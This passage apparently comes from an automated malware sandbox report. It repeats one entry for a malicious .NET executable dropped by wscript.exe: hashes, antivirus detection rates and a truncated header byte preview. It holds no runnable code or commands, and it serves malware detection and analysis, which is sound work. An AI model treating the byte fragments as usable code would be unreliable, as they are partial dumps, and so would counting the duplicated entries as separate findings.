                          • Antivirus: ReversingLabs, Detection: 35%
                          • Antivirus: Virustotal, Detection: 49%, Browse
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 35%
                          • Antivirus: Virustotal, Detection: 49%, Browse
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 35%
                          • Antivirus: Virustotal, Detection: 49%, Browse
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 35%
                          • Antivirus: Virustotal, Detection: 49%, Browse
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 35%
                          • Antivirus: Virustotal, Detection: 49%, Browse
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 35%
                          • Antivirus: Virustotal, Detection: 49%, Browse
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 35%
                          • Antivirus: Virustotal, Detection: 49%, Browse
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
